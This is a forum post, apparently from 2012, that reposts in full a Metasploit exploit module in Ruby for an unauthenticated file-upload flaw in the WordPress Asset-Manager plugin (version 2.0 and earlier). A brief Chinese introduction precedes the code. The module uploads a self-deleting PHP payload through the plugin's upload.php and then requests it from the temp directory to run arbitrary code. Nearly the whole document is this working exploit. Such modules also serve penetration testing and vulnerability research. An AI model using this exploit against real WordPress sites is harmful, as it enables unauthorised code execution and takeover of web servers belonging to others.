
WordPress Asset-Manager PHP文件上传漏洞

发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
这个模块利用的是 Metasploit 漏洞库中收录的、在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该插件允许上传 PHP 文件:用户无需身份验证即可将文件上传到一个临时目录,从而导致任意代码执行。

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

# Framework core, plus the PhpEXE mixin that supplies get_write_exec_payload.
require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WordPress
# Asset-Manager plugin (<= 2.0): upload.php stores a multipart "Filedata"
# part under wp-content/uploads/assets/temp/ and the module then requests
# that file so the PHP payload runs.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Module metadata and the single TARGETURI option (WordPress base path).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Two-step flow: POST the payload file to the plugin's upload.php, then GET
  # the stored file from the plugin's temp directory to trigger it.
  def exploit
    base = target_uri.path
    base << '/' unless base.end_with?('/')
    peer = "#{rhost}:#{rport}"
    filename = "#{rand_text_alpha(5)}.php"
    # Payload wrapper removes itself from disk once it has executed.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    message = Rex::MIME::Message.new
    message.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"")
    # Strip the leading CRLF Rex emits before the first boundary.
    body = message.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{filename}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{base}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{message.bound}",
      'data'    => body
    })

    # A successful upload echoes the stored filename back in the response body.
    unless res && res.code == 200 && res.body =~ /#{filename}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{filename}")
    res = send_request_raw({
      'uri'     => "#{base}wp-content/uploads/assets/temp/#{filename}",
      'method'  => 'GET'
    })

    # No response at all is tolerated here: the payload may not return.
    fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed") if res && res.code != 200
  end
end